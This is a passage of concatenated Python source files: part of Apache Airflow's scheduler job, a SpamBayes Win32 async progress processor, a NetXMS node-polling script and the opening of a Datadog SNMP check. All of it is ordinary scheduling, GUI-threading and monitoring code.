ti_key.execution_date,
state,
ti_key.try_number,
)
if state in (State.FAILED, State.SUCCESS, State.QUEUED):
tis_with_right_state.append(ti_key)
# Return if no finished tasks
if not tis_with_right_state:
return len(event_buffer)
# Check state of finished tasks
filter_for_tis = TI.filter_for_tis(tis_with_right_state)
tis: List[TI] = session.query(TI).filter(filter_for_tis).options(selectinload('dag_model')).all()
for ti in tis:
try_number = ti_primary_key_to_try_number_map[ti.key.primary]
buffer_key = ti.key.with_try_number(try_number)
state, info = event_buffer.pop(buffer_key)
# TODO: should we fail RUNNING as well, as we do in Backfills?
if state == State.QUEUED:
ti.external_executor_id = info
self.log.info("Setting external_id for %s to %s", ti, info)
continue
if ti.try_number == buffer_key.try_number and ti.state == State.QUEUED:
Stats.incr('scheduler.tasks.killed_externally')
msg = (
"Executor reports task instance %s finished (%s) although the "
"task says its %s. (Info: %s) Was the task killed externally?"
)
self.log.error(msg, ti, state, ti.state, info)
request = TaskCallbackRequest(
full_filepath=ti.dag_model.fileloc,
simple_task_instance=SimpleTaskInstance(ti),
msg=msg % (ti, state, ti.state, info),
)
self.processor_agent.send_callback_to_execute(request)
return len(event_buffer)
def _execute(self) -> None:
self.log.info("Starting the scheduler")
# DAGs can be pickled for easier remote execution by some executors
pickle_dags = self.do_pickle and self.executor_class not in UNPICKLEABLE_EXECUTORS
self.log.info("Processing each file at most %s times", self.num_times_parse_dags)
# When using sqlite, we do not use async_mode
# so the scheduler job and DAG parser don't access the DB at the same time.
async_mode = not self.using_sqlite
processor_timeout_seconds: int = conf.getint('core', 'dag_file_processor_timeout')
processor_timeout = timedelta(seconds=processor_timeout_seconds)
self.processor_agent = DagFileProcessorAgent(
dag_directory=self.subdir,
max_runs=self.num_times_parse_dags,
processor_factory=type(self)._create_dag_file_processor,
processor_timeout=processor_timeout,
dag_ids=[],
pickle_dags=pickle_dags,
async_mode=async_mode,
)
try:
self.executor.job_id = self.id
self.executor.start()
self.register_signals()
self.processor_agent.start()
execute_start_time = timezone.utcnow()
self._run_scheduler_loop()
# Stop any processors
self.processor_agent.terminate()
# Verify that all files were processed, and if so, deactivate DAGs that
# haven't been touched by the scheduler as they likely have been
# deleted.
if self.processor_agent.all_files_processed:
self.log.info(
"Deactivating DAGs that haven't been touched since %s", execute_start_time.isoformat()
)
models.DAG.deactivate_stale_dags(execute_start_time)
self.executor.end()
settings.Session.remove() # type: ignore
except Exception: # pylint: disable=broad-except
self.log.exception("Exception when executing SchedulerJob._run_scheduler_loop")
finally:
self.processor_agent.end()
self.log.info("Exited execute loop")
@staticmethod
def _create_dag_file_processor(
file_path: str,
callback_requests: List[CallbackRequest],
dag_ids: Optional[List[str]],
pickle_dags: bool,
) -> DagFileProcessorProcess:
"""Creates DagFileProcessorProcess instance."""
return DagFileProcessorProcess(
file_path=file_path, pickle_dags=pickle_dags, dag_ids=dag_ids, callback_requests=callback_requests
)
def _run_scheduler_loop(self) -> None:
"""
The actual scheduler loop. The main steps in the loop are:
#. Harvest DAG parsing results through DagFileProcessorAgent
#. Find and queue executable tasks
#. Change task instance state in DB
#. Queue tasks in executor
#. Heartbeat executor
#. Execute queued tasks in executor asynchronously
#. Sync on the states of running tasks
Following is a graphic representation of these steps.
.. image:: ../docs/apache-airflow/img/scheduler_loop.jpg
:rtype: None
"""
if not self.processor_agent:
raise ValueError("Processor agent is not started.")
is_unit_test: bool = conf.getboolean('core', 'unit_test_mode')
timers = sched.scheduler()
def call_regular_interval(
delay: float,
action: Callable,
arguments=(),
kwargs={},
): # pylint: disable=dangerous-default-value
def repeat(*args, **kwargs):
action(*args, **kwargs)
# This is not perfect. If we want a timer every 60s, but action
# takes 10s to run, this will run it every 70s.
# Good enough for now
timers.enter(delay, 1, repeat, args, kwargs)
timers.enter(delay, 1, repeat, arguments, kwargs)
# Check on start up, then every configured interval
self.adopt_or_reset_orphaned_tasks()
call_regular_interval(
conf.getfloat('scheduler', 'orphaned_tasks_check_interval', fallback=300.0),
self.adopt_or_reset_orphaned_tasks,
)
call_regular_interval(
conf.getfloat('scheduler', 'pool_metrics_interval', fallback=5.0),
self._emit_pool_metrics,
)
call_regular_interval(
conf.getfloat('scheduler', 'clean_tis_without_dagrun_interval', fallback=15.0),
self._clean_tis_without_dagrun,
)
for loop_count in itertools.count(start=1):
with Stats.timer() as timer:
if self.using_sqlite:
self.processor_agent.run_single_parsing_loop()
# For the sqlite case w/ 1 thread, wait until the processor
# is finished to avoid concurrent access to the DB.
self.log.debug("Waiting for processors to finish since we're using sqlite")
self.processor_agent.wait_until_finished()
with create_session() as session:
num_queued_tis = self._do_scheduling(session)
self.executor.heartbeat()
session.expunge_all()
num_finished_events = self._process_executor_events(session=session)
self.processor_agent.heartbeat()
# Heartbeat the scheduler periodically
self.heartbeat(only_if_necessary=True)
# Run any pending timed events
next_event = timers.run(blocking=False)
self.log.debug("Next timed event is in %f", next_event)
self.log.debug("Ran scheduling loop in %.2f seconds", timer.duration)
if not is_unit_test and not num_queued_tis and not num_finished_events:
# If the scheduler is doing things, don't sleep. This means when there is work to do, the
# scheduler will run "as quick as possible", but when it's stopped, it can sleep, dropping CPU
# usage when "idle"
time.sleep(min(self._processor_poll_interval, next_event))
if loop_count >= self.num_runs > 0:
self.log.info(
"Exiting scheduler loop as requested number of runs (%d - got to %d) has been reached",
self.num_runs,
loop_count,
)
break
if self.processor_agent.done:
self.log.info(
"Exiting scheduler loop as requested DAG parse count (%d) has been reached after %d"
" scheduler loops",
self.num_times_parse_dags,
loop_count,
)
break
@provide_session
def _clean_tis_without_dagrun(self, session):
with prohibit_commit(session) as guard:
try:
self._change_state_for_tis_without_dagrun(
old_states=[State.UP_FOR_RETRY], new_state=State.FAILED, session=session
)
self._change_state_for_tis_without_dagrun(
old_states=[State.QUEUED, State.SCHEDULED, State.UP_FOR_RESCHEDULE, State.SENSING],
new_state=State.NONE,
session=session,
)
guard.commit()
except OperationalError as e:
if is_lock_not_available_error(error=e):
self.log.debug("Lock held by another Scheduler")
session.rollback()
else:
raise
guard.commit()
def _do_scheduling(self, session) -> int:
"""
This function is where the main scheduling decisions take place. It:
- Creates any necessary DAG runs by examining the next_dagrun_create_after column of DagModel
Since creating Dag Runs is a relatively time consuming process, we select only 10 dags by default
(configurable via ``scheduler.max_dagruns_to_create_per_loop`` setting) - putting this higher will
mean one scheduler could spend a chunk of time creating dag runs, and not ever get around to
scheduling tasks.
- Finds the "next n oldest" running DAG Runs to examine for scheduling (n=20 by default, configurable
via ``scheduler.max_dagruns_per_loop_to_schedule`` config setting) and tries to progress state (TIs
to SCHEDULED, or DagRuns to SUCCESS/FAILURE etc)
By "next oldest", we mean hasn't been examined/scheduled in the most time.
The reason we don't select all dagruns at once because the rows are selected with row locks, meaning
that only one scheduler can "process them", even it it is waiting behind other dags. Increasing this
limit will allow more throughput for smaller DAGs but will likely slow down throughput for larger
(>500 tasks.) DAGs
- Then, via a Critical Section (locking the rows of the Pool model) we queue tasks, and then send them
to the executor.
See docs of _critical_section_execute_task_instances for more.
:return: Number of TIs enqueued in this iteration
:rtype: int
"""
# Put a check in place to make sure we don't commit unexpectedly
with prohibit_commit(session) as guard:
if settings.USE_JOB_SCHEDULE:
self._create_dagruns_for_dags(guard, session)
dag_runs = self._get_next_dagruns_to_examine(session)
# Bulk fetch the currently active dag runs for the dags we are
# examining, rather than making one query per DagRun
# TODO: This query is probably horribly inefficient (though there is an
# index on (dag_id,state)). It is to deal with the case when a user
# clears more than max_active_runs older tasks -- we don't want the
# scheduler to suddenly go and start running tasks from all of the
# runs. (AIRFLOW-137/GH #1442)
#
# The longer term fix would be to have `clear` do this, and put DagRuns
# into the queued state, then take DRs out of queued before creating
# any new ones
# Build up a set of execution_dates that are "active" for a given
# dag_id -- only tasks from those runs will be scheduled.
active_runs_by_dag_id = defaultdict(set)
query = (
session.query(
TI.dag_id,
TI.execution_date,
)
.filter(
TI.dag_id.in_(list({dag_run.dag_id for dag_run in dag_runs})),
TI.state.notin_(list(State.finished) + [State.REMOVED]),
)
.group_by(TI.dag_id, TI.execution_date)
)
for dag_id, execution_date in query:
active_runs_by_dag_id[dag_id].add(execution_date)
for dag_run in dag_runs:
# Use try_except to not stop the Scheduler when a Serialized DAG is not found
# This takes care of Dynamic DAGs especially
# SerializedDagNotFound should not happen here in the same loop because the DagRun would
# not be created in self._create_dag_runs if Serialized DAG does not exist
# But this would take care of the scenario when the Scheduler is restarted after DagRun is
# created and the DAG is deleted / renamed
try:
self._schedule_dag_run(dag_run, active_runs_by_dag_id.get(dag_run.dag_id, set()), session)
except SerializedDagNotFound:
self.log.exception("DAG '%s' not found in serialized_dag table", dag_run.dag_id)
continue
guard.commit()
# Without this, the session has an invalid view of the DB
session.expunge_all()
# END: schedule TIs
try:
if self.executor.slots_available <= 0:
# We know we can't do anything here, so don't even try!
self.log.debug("Executor full, skipping critical section")
return 0
timer = Stats.timer('scheduler.critical_section_duration')
timer.start()
# Find any TIs in state SCHEDULED, try to QUEUE them (send them to the executor)
num_queued_tis = self._critical_section_execute_task_instances(session=session)
# Make sure we only send this metric if we obtained the lock, otherwise we'll skew the
# metric way down
timer.stop(send=True)
except OperationalError as e:
timer.stop(send=False)
if is_lock_not_available_error(error=e):
self.log.debug("Critical section lock held by another Scheduler")
Stats.incr('scheduler.critical_section_busy')
session.rollback()
return 0
raise
guard.commit()
return num_queued_tis
def _get_next_dagruns_to_examine(self, session):
"""Get Next DagRuns to Examine with retries"""
for attempt in run_with_db_retries(logger=self.log):
with attempt:
try:
self.log.debug(
"Running SchedulerJob._get_dagmodels_and_create_dagruns with retries. "
"Try %d of %d",
attempt.retry_state.attempt_number,
settings.MAX_DB_RETRIES,
)
dag_runs = DagRun.next_dagruns_to_examine(session)
except OperationalError:
session.rollback()
raise
return dag_runs
def _create_dagruns_for_dags(self, guard, session):
"""Find Dag Models needing DagRuns and Create Dag Runs with retries in case of OperationalError"""
for attempt in run_with_db_retries(logger=self.log):
with attempt:
try:
self.log.debug(
"Running SchedulerJob._create_dagruns_for_dags with retries. " "Try %d of %d",
attempt.retry_state.attempt_number,
settings.MAX_DB_RETRIES,
)
query = DagModel.dags_needing_dagruns(session)
self._create_dag_runs(query.all(), session)
# commit the session - Release the write lock on DagModel table.
guard.commit()
# END: create dagruns
except OperationalError:
session.rollback()
raise
def _create_dag_runs(self, dag_models: Iterable[DagModel], session: Session) -> None:
"""
Unconditionally create a DAG run for the given DAG, and update the dag_model's fields to control
if/when the next DAGRun should be created
"""
# Bulk Fetch DagRuns with dag_id and execution_date same
# as DagModel.dag_id and DagModel.next_dagrun
# This list is used to verify if the DagRun already exists so that we don't attempt to create
# duplicate dag runs
active_dagruns = (
session.query(DagRun.dag_id, DagRun.execution_date)
.filter(
tuple_(DagRun.dag_id, DagRun.execution_date).in_(
[(dm.dag_id, dm.next_dagrun) for dm in dag_models]
)
)
.all()
)
for dag_model in dag_models:
try:
dag = self.dagbag.get_dag(dag_model.dag_id, session=session)
except SerializedDagNotFound:
self.log.exception("DAG '%s' not found in serialized_dag table", dag_model.dag_id)
continue
dag_hash = self.dagbag.dags_hash.get(dag.dag_id)
# Explicitly check if the DagRun already exists. This is an edge case
# where a Dag Run is created but `DagModel.next_dagrun` and `DagModel.next_dagrun_create_after`
# are not updated.
# We opted to check DagRun existence instead
# of catching an IntegrityError and rolling back the session, i.e.
# we need to run self._update_dag_next_dagruns if the Dag Run already exists or if we
# create a new one. This is so that in the next scheduling loop we try to create new runs
# instead of falling into a loop of IntegrityErrors.
if (dag.dag_id, dag_model.next_dagrun) not in active_dagruns:
dag.create_dagrun(
run_type=DagRunType.SCHEDULED,
execution_date=dag_model.next_dagrun,
start_date=timezone.utcnow(),
state=State.RUNNING,
external_trigger=False,
session=session,
dag_hash=dag_hash,
creating_job_id=self.id,
)
self._update_dag_next_dagruns(dag_models, session)
# TODO[HA]: Should we do a session.flush() so we don't have to keep lots of state/object in
# memory for larger dags? or expunge_all()
def _update_dag_next_dagruns(self, dag_models: Iterable[DagModel], session: Session) -> None:
"""
Bulk update the next_dagrun and next_dagrun_create_after for all the dags.
We batch the select queries to get info about all the dags at once
"""
# Check max_active_runs, to see if we are _now_ at the limit for any of
# these dags (we've just created a DagRun for them, after all)
active_runs_of_dags = dict(
session.query(DagRun.dag_id, func.count('*'))
.filter(
DagRun.dag_id.in_([o.dag_id for o in dag_models]),
DagRun.state == State.RUNNING, # pylint: disable=comparison-with-callable
DagRun.external_trigger.is_(False),
)
.group_by(DagRun.dag_id)
.all()
)
for dag_model in dag_models:
# Get the DAG in a try_except to not stop the Scheduler when a Serialized DAG is not found
# This takes care of Dynamic DAGs especially
try:
dag = self.dagbag.get_dag(dag_model.dag_id, session=session)
except SerializedDagNotFound:
self.log.exception("DAG '%s' not found in serialized_dag table", dag_model.dag_id)
continue
active_runs_of_dag = active_runs_of_dags.get(dag.dag_id, 0)
if dag.max_active_runs and active_runs_of_dag >= dag.max_active_runs:
self.log.info(
"DAG %s is at (or above) max_active_runs (%d of %d), not creating any more runs",
dag.dag_id,
active_runs_of_dag,
dag.max_active_runs,
)
dag_model.next_dagrun_create_after = None
else:
dag_model.next_dagrun, dag_model.next_dagrun_create_after = dag.next_dagrun_info(
dag_model.next_dagrun
)
def _schedule_dag_run(
self,
dag_run: DagRun,
currently_active_runs: Set[datetime.datetime],
session: Session,
) -> int:
"""
Make scheduling decisions about an individual dag run
``currently_active_runs`` is passed in so that a batch query can be
used to compute this for all dag runs in the batch, avoiding an n+1 query.
:param dag_run: The DagRun to schedule
:param currently_active_runs: Execution dates of the currently active runs of this DAG
:return: Number of tasks scheduled
"""
dag = dag_run.dag = self.dagbag.get_dag(dag_run.dag_id, session=session)
if not dag:
self.log.error("Couldn't find dag %s in DagBag/DB!", dag_run.dag_id)
return 0
if (
dag_run.start_date
and dag.dagrun_timeout
and dag_run.start_date < timezone.utcnow() - dag.dagrun_timeout
):
dag_run.state = State.FAILED
dag_run.end_date = timezone.utcnow()
self.log.info("Run %s of %s has timed-out", dag_run.run_id, dag_run.dag_id)
session.flush()
# Work out whether we should allow creating a new DagRun now
self._update_dag_next_dagruns([session.query(DagModel).get(dag_run.dag_id)], session)
callback_to_execute = DagCallbackRequest(
full_filepath=dag.fileloc,
dag_id=dag.dag_id,
execution_date=dag_run.execution_date,
is_failure_callback=True,
msg='timed_out',
)
# Send SLA & DAG Success/Failure Callbacks to be executed
self._send_dag_callbacks_to_processor(dag_run, callback_to_execute)
return 0
if dag_run.execution_date > timezone.utcnow() and not dag.allow_future_exec_dates:
self.log.error("Execution date is in future: %s", dag_run.execution_date)
return 0
if dag.max_active_runs:
if (
len(currently_active_runs) >= dag.max_active_runs
and dag_run.execution_date not in currently_active_runs
):
self.log.info(
"DAG %s already has %d active runs, not queuing any tasks for run %s",
dag.dag_id,
len(currently_active_runs),
dag_run.execution_date,
)
return 0
self._verify_integrity_if_dag_changed(dag_run=dag_run, session=session)
# TODO[HA]: Rename update_state -> schedule_dag_run, ?? something else?
schedulable_tis, callback_to_run = dag_run.update_state(session=session, execute_callbacks=False)
self._send_dag_callbacks_to_processor(dag_run, callback_to_run)
# This will do one query per dag run. We "could" build up a complex
# query to update all the TIs across all the execution dates and dag
# IDs in a single query, but it turns out that can be _very very slow_
# see #11147/commit ee90807ac for more details
return dag_run.schedule_tis(schedulable_tis, session)
@provide_session
def _verify_integrity_if_dag_changed(self, dag_run: DagRun, session=None):
"""Only run DagRun.verify integrity if Serialized DAG has changed since it is slow"""
latest_version = SerializedDagModel.get_latest_version_hash(dag_run.dag_id, session=session)
if dag_run.dag_hash == latest_version:
self.log.debug("DAG %s not changed structure, skipping dagrun.verify_integrity", dag_run.dag_id)
return
dag_run.dag_hash = latest_version
# Refresh the DAG
dag_run.dag = self.dagbag.get_dag(dag_id=dag_run.dag_id, session=session)
# Verify integrity also takes care of session.flush
dag_run.verify_integrity(session=session)
def _send_dag_callbacks_to_processor(
self, dag_run: DagRun, callback: Optional[DagCallbackRequest] = None
):
if not self.processor_agent:
raise ValueError("Processor agent is not started.")
dag = dag_run.get_dag()
self._send_sla_callbacks_to_processor(dag)
if callback:
self.processor_agent.send_callback_to_execute(callback)
def _send_sla_callbacks_to_processor(self, dag: DAG):
"""Sends SLA Callbacks to DagFileProcessor if tasks have SLAs set and check_slas=True"""
if not settings.CHECK_SLAS:
return
if not any(isinstance(ti.sla, timedelta) for ti in dag.tasks):
self.log.debug("Skipping SLA check for %s because no tasks in DAG have SLAs", dag)
return
if not self.processor_agent:
raise ValueError("Processor agent is not started.")
self.processor_agent.send_sla_callback_request_to_execute(
full_filepath=dag.fileloc, dag_id=dag.dag_id
)
@provide_session
def _emit_pool_metrics(self, session: Session = None) -> None:
pools = models.Pool.slots_stats(session=session)
for pool_name, slot_stats in pools.items():
Stats.gauge(f'pool.open_slots.{pool_name}', slot_stats["open"])
Stats.gauge(f'pool.queued_slots.{pool_name}', slot_stats[State.QUEUED]) # type: ignore
Stats.gauge(f'pool.running_slots.{pool_name}', slot_stats[State.RUNNING]) # type: ignore
@provide_session
def heartbeat_callback(self, session: Session = None) -> None:
Stats.incr('scheduler_heartbeat', 1, 1)
@provide_session
def adopt_or_reset_orphaned_tasks(self, session: Session = None):
"""
Reset any TaskInstance still in QUEUED or SCHEDULED states that were
enqueued by a SchedulerJob that is no longer running.
:return: the number of TIs reset
:rtype: int
"""
self.log.info("Resetting orphaned tasks for active dag runs")
timeout = conf.getint('scheduler', 'scheduler_health_check_threshold')
for attempt in run_with_db_retries(logger=self.log):
with attempt:
self.log.debug(
"Running SchedulerJob.adopt_or_reset_orphaned_tasks with retries. Try %d of %d",
attempt.retry_state.attempt_number,
settings.MAX_DB_RETRIES,
)
self.log.debug("Calling SchedulerJob.adopt_or_reset_orphaned_tasks method")
try:
num_failed = (
session.query(SchedulerJob)
.filter(
SchedulerJob.state == State.RUNNING,
SchedulerJob.latest_heartbeat < (timezone.utcnow() - timedelta(seconds=timeout)),
)
.update({"state": State.FAILED})
)
if num_failed:
self.log.info("Marked %d SchedulerJob instances as failed", num_failed)
Stats.incr(self.__class__.__name__.lower() + '_end', num_failed)
resettable_states = [State.SCHEDULED, State.QUEUED, State.RUNNING]
query = (
session.query(TI)
.filter(TI.state.in_(resettable_states))
# outerjoin is because we didn't use to have queued_by_job
# set, so we need to pick up anything pre upgrade. This (and the
# "or queued_by_job_id IS NONE") can go as soon as scheduler HA is
# released.
.outerjoin(TI.queued_by_job)
.filter(or_(TI.queued_by_job_id.is_(None), SchedulerJob.state != State.RUNNING))
.join(TI.dag_run)
.filter(
DagRun.run_type != DagRunType.BACKFILL_JOB,
# pylint: disable=comparison-with-callable
DagRun.state == State.RUNNING,
)
.options(load_only(TI.dag_id, TI.task_id, TI.execution_date))
)
# Lock these rows, so that another scheduler can't try and adopt these too
tis_to_reset_or_adopt = with_row_locks(
query, of=TI, session=session, **skip_locked(session=session)
).all()
to_reset = self.executor.try_adopt_task_instances(tis_to_reset_or_adopt)
reset_tis_message = []
for ti in to_reset:
reset_tis_message.append(repr(ti))
ti.state = State.NONE
ti.queued_by_job_id = None
for ti in set(tis_to_reset_or_adopt) - set(to_reset):
ti.queued_by_job_id = self.id
Stats.incr('scheduler.orphaned_tasks.cleared', len(to_reset))
Stats.incr('scheduler.orphaned_tasks.adopted', len(tis_to_reset_or_adopt) - len(to_reset))
if to_reset:
task_instance_str = '\n\t'.join(reset_tis_message)
self.log.info(
"Reset the following %s orphaned TaskInstances:\n\t%s",
len(to_reset),
task_instance_str,
)
# Issue SQL/finish "Unit of Work", but let @provide_session
# commit (or, if passed a session, let the caller decide when to commit)
session.flush()
except OperationalError:
session.rollback()
raise
return len(to_reset)
|
async_processor.py
|
# An async command processor
from dlgutils import *
import win32gui, win32api, win32con, commctrl
import win32process
import time
import processors
verbose = 0
IDC_START = 1100
IDC_PROGRESS = 1101
IDC_PROGRESS_TEXT = 1102
MYWM_SETSTATUS = win32con.WM_USER+11
MYWM_SETWARNING = win32con.WM_USER+12
MYWM_SETERROR = win32con.WM_USER+13
MYWM_FINISHED = win32con.WM_USER+14
# This is called from another thread - hence we need to jump through hoops!
class _Progress:
def __init__(self, processor):
self.hdlg = processor.window.hwnd
self.hprogress = processor.GetControl(processor.statusbar_id)
self.processor = processor
self.stopping = False
self.total_control_ticks = 40
self.current_stage = 0
self.set_stages( (("", 1.0),) )
def set_stages(self, stages):
self.stages = []
start_pos = 0.0
for name, prop in stages:
stage = name, start_pos, prop
start_pos += prop
self.stages.append(stage)
assert abs(start_pos-1.0) < 0.001, (
"Proportions must add to 1.0 (%r,%r,%r)" %
(start_pos, stages, start_pos-1.0))
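# Illustrative example: set_stages((("Retrieving", 0.25), ("Scoring", 0.75)))
# gives the first stage the first quarter of the progress bar and the second
# stage the remaining three quarters.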
def _next_stage(self):
if self.current_stage == 0:
win32api.PostMessage(self.hprogress, commctrl.PBM_SETRANGE, 0, MAKELPARAM(0,self.total_control_ticks))
win32api.PostMessage(self.hprogress, commctrl.PBM_SETSTEP, 1, 0)
win32api.PostMessage(self.hprogress, commctrl.PBM_SETPOS, 0, 0)
self.current_stage += 1
assert self.current_stage <= len(self.stages)
def _get_current_stage(self):
return self.stages[self.current_stage-1]
def set_max_ticks(self, m):
# skip to the stage.
self._next_stage()
self.current_stage_max = m
self.current_stage_tick = -1 # ready to go to zero!
# if earlier stages stopped early, skip ahead.
self.tick()
def tick(self):
if self.current_stage_tick < self.current_stage_max:
# Don't let us go beyond our stage max
self.current_stage_tick += 1
# Calc how far through this stage.
this_prop = float(self.current_stage_tick) / self.current_stage_max
# How far through the total.
stage_name, start, prop = self._get_current_stage()
total_prop = start + this_prop * prop
# How many ticks is this on the control (but always have at least 1, so the
# user knows the process has actually started.)
control_tick = max(1,int(total_prop * self.total_control_ticks))
if verbose:
print "Tick", self.current_stage_tick, "is", this_prop, "through the stage,", total_prop, "through the total - ctrl tick is", control_tick
win32api.PostMessage(self.hprogress, commctrl.PBM_SETPOS, control_tick)
def _get_stage_text(self, text):
stage_name, start, end = self._get_current_stage()
if stage_name:
text = stage_name + ": " + text
return text
def set_status(self, text):
self.processor.progress_status = self._get_stage_text(text)
win32api.PostMessage(self.hdlg, MYWM_SETSTATUS)
def warning(self, text):
self.processor.progress_warning = self._get_stage_text(text)
win32api.PostMessage(self.hdlg, MYWM_SETWARNING)
def error(self, text):
self.processor.progress_error = self._get_stage_text(text)
win32api.PostMessage(self.hdlg, MYWM_SETERROR)
def request_stop(self):
self.stopping = True
def stop_requested(self):
return self.stopping
class AsyncCommandProcessor(processors.CommandButtonProcessor):
def __init__(self, window, control_ids, func, start_text, stop_text, disable_ids):
processors.CommandButtonProcessor.__init__(self, window, control_ids[:1], func, ())
self.progress_status = ""
self.progress_error = ""
self.progress_warning = ""
self.running = False
self.statusbar_id = control_ids[1]
self.statustext_id = control_ids[2]
self.process_start_text = start_text
self.process_stop_text = stop_text
dids = self.disable_while_running_ids = []
for id in disable_ids.split():
dids.append(window.manager.dialog_parser.ids[id])
def Init(self):
win32gui.ShowWindow(self.GetControl(self.statusbar_id), win32con.SW_HIDE)
self.SetStatusText("")
def Done(self):
if self.running:
msg = "You must let the running process finish before closing this window"
win32gui.MessageBox(self.window.hwnd, msg, "SpamBayes",
win32con.MB_OK | win32con.MB_ICONEXCLAMATION)
return not self.running
def Term(self):
# The Window is dying! We *must* kill it and wait for it to finish
# else bad things happen once the main thread dies before us!
if self.running:
self.progress.request_stop()
i = 0
while self.running:
win32gui.PumpWaitingMessages(0,-1)
if i % 100 == 0:
print "Still waiting for async process to finish..."
time.sleep(0.01)
i += 1
return True
def GetMessages(self):
return [MYWM_SETSTATUS, MYWM_SETWARNING, MYWM_SETERROR, MYWM_FINISHED]
def SetEnabledStates(self, enabled):
for id in self.disable_while_running_ids:
win32gui.EnableWindow(self.GetControl(id), enabled)
def OnMessage(self, msg, wparam, lparam):
if msg == MYWM_SETSTATUS:
self.OnProgressStatus(wparam, lparam)
elif msg == MYWM_SETWARNING:
self.OnProgressWarning(wparam, lparam)
elif msg == MYWM_SETERROR:
self.OnProgressError(wparam, lparam)
elif msg == MYWM_FINISHED:
self.OnFinished(wparam, lparam)
else:
raise RuntimeError, "Not one of my messages??"
def OnFinished(self, wparam, lparam):
self.seen_finished = True
wasCancelled = wparam
self.SetEnabledStates(True)
if self.process_start_text:
win32gui.SendMessage(self.GetControl(), win32con.WM_SETTEXT,
0, self.process_start_text)
win32gui.ShowWindow(self.GetControl(self.statusbar_id), win32con.SW_HIDE)
if wasCancelled:
self.SetStatusText("Cancelled")
def SetStatusText(self, text):
win32gui.SendMessage(self.GetControl(self.statustext_id),
win32con.WM_SETTEXT,
0, text)
def OnProgressStatus(self, wparam, lparam):
self.SetStatusText(self.progress_status)
def OnProgressError(self, wparam, lparam):
self.SetStatusText(self.progress_error)
win32gui.MessageBox(self.window.hwnd,
self.progress_error, "SpamBayes",
win32con.MB_OK | win32con.MB_ICONEXCLAMATION)
if not self.running and not self.seen_finished:
self.OnFinished(0,0)
def OnProgressWarning(self, wparam, lparam):
pass
def OnClicked(self, id):
self.StartProcess()
def StartProcess(self):
if self.running:
self.progress.request_stop()
else:
# Do anything likely to fail before we screw around with the
# control states - this way the dialog doesn't look as 'dead'
progress=_Progress(self)
# Now screw around with the control states, restored when
# the thread terminates.
self.SetEnabledStates(False)
if self.process_stop_text:
win32gui.SendMessage(self.GetControl(),
win32con.WM_SETTEXT,
0, self.process_stop_text)
win32gui.SendMessage(self.GetControl(self.statustext_id),
win32con.WM_SETTEXT, 0, "")
win32gui.ShowWindow(self.GetControl(self.statusbar_id),
win32con.SW_SHOW)
# Local function for the thread target that notifies us when finished.
def thread_target(h, progress):
try:
self.progress = progress
self.seen_finished = False
self.running = True
# Drop my thread priority, so outlook can keep repainting
# and doing its stuff without getting stressed.
import win32process, win32api
THREAD_PRIORITY_BELOW_NORMAL=-1
win32process.SetThreadPriority(win32api.GetCurrentThread(), THREAD_PRIORITY_BELOW_NORMAL)
self.func( self.window.manager, self.window.config, progress)
finally:
try:
win32api.PostMessage(h, MYWM_FINISHED, self.progress.stop_requested())
except win32api.error:
# Bad window handle - already down.
pass
self.running = False
self.progress = None
# back to the program :)
import threading
t = threading.Thread(target=thread_target, args =(self.window.hwnd, progress))
t.start()
if __name__=='__main__':
verbose = 1
# Test my "multi-stage" code
class HackProgress(_Progress):
def __init__(self): # don't use dlg
self.hprogress = self.hdlg = 0
self.dlg = None
self.stopping = False
self.total_control_ticks = 40
self.current_stage = 0
self.set_stages( (("", 1.0),) )
print "Single stage test"
p = HackProgress()
p.set_max_ticks(10)
for i in range(10):
p.tick()
print "First stage test"
p = HackProgress()
stages = ("Stage 1", 0.2), ("Stage 2", 0.8)
p.set_stages(stages)
# Do stage 1
p.set_max_ticks(10)
for i in range(10):
p.tick()
# Do stage 2
p.set_max_ticks(20)
for i in range(20):
p.tick()
print "Second stage test"
p = HackProgress()
stages = ("Stage 1", 0.9), ("Stage 2", 0.1)
p.set_stages(stages)
p.set_max_ticks(10)
for i in range(7): # do a few less just to check
p.tick()
p.set_max_ticks(2)
for i in range(2):
p.tick()
print "Third stage test"
p = HackProgress()
stages = ("Stage 1", 0.9), ("Stage 2", 0.1)
p.set_stages(stages)
p.set_max_ticks(300)
for i in range(313): # do a few more just to check
p.tick()
p.set_max_ticks(2)
for i in range(2):
p.tick()
print "Done!"
|
poll_nodes_in_container.py
|
#!/usr/bin/env nxshell
import threading
import org.netxms.client.TextOutputListener
from Queue import Queue
from threading import Thread
class ProgressCallback(org.netxms.client.TextOutputListener):
def messageReceived(self, text):
print(self.tag + ": " + text.strip())
pass
def onError(self):
print(self.tag + ": onError")
pass
def setStreamId(self, streamId):
pass
def worker():
while True:
print("###: qsize %s ###" % q.qsize());
node = q.get()
cb = ProgressCallback()
cb.tag = node.objectName
#s.pollNode(node.objectId, NodePollType.CONFIGURATION_NORMAL, cb)
s.pollNode(node.objectId, NodePollType.CONFIGURATION_FULL, cb)
q.task_done()
q = Queue()
for i in range(25):
t = Thread(target=worker)
t.daemon = True
t.start()
container = s.findObjectById(7397)
nodes = [o for o in container.childrenAsArray if isinstance(o, objects.Node)]
for node in nodes:
q.put(node)
q.join()
print("######## ALL DONE")
|
snmp.py
|
# (C) Datadog, Inc. 2010-2019
# All rights reserved
# Licensed under Simplified BSD License (see LICENSE)
import fnmatch
import ipaddress
import json
import os
import threading
import time
from collections import defaultdict
import pysnmp.proto.rfc1902 as snmp_type
import yaml
from pyasn1.codec.ber import decoder
from pysnmp import hlapi
from pysnmp.error import PySnmpError
from pysnmp.smi import builder
from pysnmp.smi.exval import noSuchInstance, noSuchObject
from six import iteritems
from datadog_checks.base import AgentCheck, ConfigurationError, is_affirmative
from datadog_checks.base.errors import CheckException
from .config import InstanceConfig
try:
from datadog_checks.base.utils.common import total_time_to_temporal_percent
except ImportError:
# Provide fallback for agent < 6.16
def total_time_to_temporal_percent(total_time, scale=1000):
return total_time / scale * 100
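# For example, 500 (ms of busy time) with the default scale of 1000 maps to
# 50, i.e. 50% of one second.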
try:
from datadog_agent import get_config, read_persistent_cache, write_persistent_cache
except ImportError:
def get_config(value):
return ''
def write_persistent_cache(value, key):
pass
def read_persistent_cache(value):
return ''
# Additional types that are not part of the SNMP protocol. cf RFC 2856
CounterBasedGauge64, ZeroBasedCounter64 = builder.MibBuilder().importSymbols(
'HCNUM-TC', 'CounterBasedGauge64', 'ZeroBasedCounter64'
)
# Metric types that we support
SNMP_COUNTERS = frozenset([snmp_type.Counter32.__name__, snmp_type.Counter64.__name__, ZeroBasedCounter64.__name__])
SNMP_GAUGES = frozenset(
[
snmp_type.Gauge32.__name__,
snmp_type.Unsigned32.__name__,
